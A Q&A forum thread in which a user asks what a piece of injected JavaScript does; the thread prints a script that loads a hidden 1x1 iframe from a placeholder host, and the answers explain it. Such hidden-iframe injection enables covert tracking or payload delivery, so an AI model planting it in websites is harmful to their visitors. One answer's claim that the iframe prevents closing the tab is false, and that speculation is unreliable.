# Malicious JavaScript code

Tags: javascript

What exactly is this malicious javascript code doing?

```
(function () {
    var qk = document.createElement('iframe');

    qk.src = 'http://xxx.tld/wp-includes/dtd.php';
    qk.style.position = 'absolute';
    qk.style.border = '0';
    qk.style.height = '1px';
    qk.style.width = '1px';
    qk.style.left = '1px';
    qk.style.top = '1px';

    if (!document.getElementById('qk')) {
        document.write('<div id=\'qk\'></div>');
        document.getElementById('qk').appendChild(qk);
    }
})();
```

The website at `http://xxx.tld/wp-includes/dtd.php` just returns OK.

Answer (score 5, accepted):

It is:

```
(function () {
    var qk = document.createElement('iframe');  // creating an iframe

    qk.src = 'http://xxx.tld/wp-includes/dtd.php';  // pointing it at a webpage

    /*
    making the iframe only take up a 1px by 1px square
    in the top left-hand corner of the web page it is injected into
    */
    qk.style.position = 'absolute';
    qk.style.border = '0';
    qk.style.height = '1px';
    qk.style.width = '1px';
    qk.style.left = '1px';
    qk.style.top = '1px';

    /*
    Adding the iframe to the DOM by creating a <div> with an ID of "qt"
    (If the div has not been created already)
    */    
    if (!document.getElementById('qk')) {
        document.write('<div id=\'qk\'></div>');
        document.getElementById('qk').appendChild(qk);
    }
})();
```

When the iframe is injected into the DOM the browser will make a request to `http://xxx.tld/etc`.  It is most likely doing this to track hits on your site.

Comment: good catch on the 1 x 1 size. I breezed past then when I saw the php extension.

Comment: How bad could a php extension be?  What kind of maliciousness could happen if you do not download anything?

Answer (score 0):

It opens an iframe and runs a php script.

Which probably contains who knows what.

Also it appears to require the existence of a div with the id of qk. 
Perhaps to inject other bad code.

Comment: If its on the web you can go read the script, but I will not open such a URL on my machine.

Answer (score 0):

It is setting the width and height to 1 pixel, therefore stopping you closing the tab. It is also setting an iframe to that website which will probably set a cookie to track you.